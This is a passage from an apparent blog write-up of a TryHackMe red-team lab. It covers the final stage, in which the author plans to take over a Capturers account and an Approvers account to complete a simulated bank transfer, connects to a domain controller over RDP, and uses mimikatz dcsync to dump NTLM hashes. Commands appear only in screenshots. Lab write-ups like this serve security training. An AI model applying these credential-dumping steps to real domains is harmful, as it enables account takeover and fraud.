#F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">million<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">dollars<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">5.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Once<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">completed,<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">request<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">verification<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">of<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">your<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">transaction<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">here<\/span><span style=\"color: #F8F8F2\"> (No <\/span><span 
style=\"color: #F1FA8C\">need<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">check<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">your<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">email<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">once<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">transfer<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">has<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">been<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">created<\/span><span style=\"color: #F8F8F2\">).<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can log in with the credentials provided to us and make the transaction.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911efc0&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911efc0\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"547\" data-attachment-id=\"529\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210194126\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?fit=1202%2C642&amp;ssl=1\" data-orig-size=\"1202,642\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210194126\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?fit=1024%2C547&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?resize=1024%2C547&#038;ssl=1\" alt=\"\" class=\"wp-image-529\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?resize=1024%2C547&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?resize=300%2C160&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?resize=768%2C410&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?w=1202&amp;ssl=1 1202w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We received a PIN in our email and using it we can confirm that our transaction was initiated.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911f608&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911f608\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"371\" data-attachment-id=\"530\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210212157\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?fit=1080%2C391&amp;ssl=1\" data-orig-size=\"1080,391\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210212157\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?fit=1024%2C371&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?resize=1024%2C371&#038;ssl=1\" alt=\"\" class=\"wp-image-530\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?resize=1024%2C371&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?resize=300%2C109&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?resize=768%2C278&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?w=1080&amp;ssl=1 1080w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911fb29&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911fb29\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"403\" data-attachment-id=\"531\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210212722\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?fit=1488%2C585&amp;ssl=1\" data-orig-size=\"1488,585\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210212722\" data-image-description=\"\" 
data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?fit=1024%2C403&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?resize=1024%2C403&#038;ssl=1\" alt=\"\" class=\"wp-image-531\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?resize=1024%2C403&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?resize=300%2C118&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?resize=768%2C302&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?w=1488&amp;ssl=1 1488w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div 
style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We get further instructions in our email, which state that we need to compromise a capturer&#8217;s and an approver&#8217;s account, log in with each account in turn, and complete the transaction. To break it down further:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>We need a user account from the <code>Capturers<\/code> group<\/li>\n\n\n\n<li>We need to log in with this account and capture the transaction<\/li>\n\n\n\n<li>We also need a user account from the <code>Approvers<\/code> group<\/li>\n\n\n\n<li>We then need to log in as the approver and complete the transaction to achieve the goal<\/li>\n<\/ul>\n\n\n\n<p>Let&#8217;s connect to BANKDC via RDP and enumerate the user groups.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091201d1&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091201d1\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"551\" data-attachment-id=\"532\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210202643\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?fit=1332%2C717&amp;ssl=1\" data-orig-size=\"1332,717\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" 
data-image-title=\"Pasted-image-20240210202643\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?fit=1024%2C551&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?resize=1024%2C551&#038;ssl=1\" alt=\"\" class=\"wp-image-532\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?resize=1024%2C551&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?resize=300%2C161&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?resize=768%2C413&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?w=1332&amp;ssl=1 1332w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We notice two groups that we are interested in. We can check the users in each group. 
We don&#8217;t need to compromise every account; one account from each group is enough to complete the task.<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09120779&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09120779\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"533\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210202717\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?fit=1272%2C715&amp;ssl=1\" data-orig-size=\"1272,715\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210202717\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?fit=1024%2C576&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" 
data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-533\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?resize=1024%2C576&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?resize=300%2C169&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?resize=768%2C432&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?w=1272&amp;ssl=1 1272w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09120c28&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09120c28\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" 
height=\"613\" data-attachment-id=\"534\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210202755\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?fit=1232%2C738&amp;ssl=1\" data-orig-size=\"1232,738\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210202755\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?fit=1024%2C613&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?resize=1024%2C613&#038;ssl=1\" alt=\"\" class=\"wp-image-534\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?resize=1024%2C613&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?resize=300%2C180&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?resize=768%2C460&amp;ssl=1 768w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?w=1232&amp;ssl=1 1232w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can use <code>mimikatz<\/code> to perform a <code>dcsync<\/code> attack and dump the NTLM hashes for the users in both groups. 
We already had the file on the ROOTDC machine.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09121111&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09121111\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"981\" height=\"695\" data-attachment-id=\"535\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210203044\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?fit=981%2C695&amp;ssl=1\" data-orig-size=\"981,695\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210203044\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?fit=981%2C695&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?resize=981%2C695&#038;ssl=1\" alt=\"\" class=\"wp-image-535\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?w=981&amp;ssl=1 981w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?resize=300%2C213&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?resize=768%2C544&amp;ssl=1 768w\" sizes=\"auto, (max-width: 981px) 100vw, 981px\" \/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can download <code>mimikatz<\/code> from the ROOTDC machine to BANKDC.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091216bf&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091216bf\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"599\" data-attachment-id=\"536\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210203557\/\" 
data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?fit=1330%2C778&amp;ssl=1\" data-orig-size=\"1330,778\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210203557\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?fit=1024%2C599&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?resize=1024%2C599&#038;ssl=1\" alt=\"\" class=\"wp-image-536\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?resize=1024%2C599&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?resize=300%2C175&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?resize=768%2C449&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?w=1330&amp;ssl=1 1330w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can grab the hashes for each user now.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09121dd4&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09121dd4\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"433\" data-attachment-id=\"537\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210203707\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?fit=1317%2C557&amp;ssl=1\" data-orig-size=\"1317,557\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210203707\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?fit=1024%2C433&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?resize=1024%2C433&#038;ssl=1\" alt=\"\" class=\"wp-image-537\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?resize=1024%2C433&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?resize=300%2C127&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?resize=768%2C325&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?w=1317&amp;ssl=1 1317w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
